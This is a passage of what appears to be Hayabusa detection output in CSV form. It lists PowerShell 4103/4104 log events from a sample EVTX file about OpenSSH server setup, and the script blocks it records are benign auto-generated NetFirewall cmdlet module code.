[Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' -Alias '*' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.338 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.339 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.339 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.340 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.370 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' -Alias '*' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.370 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' -Alias '*' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query 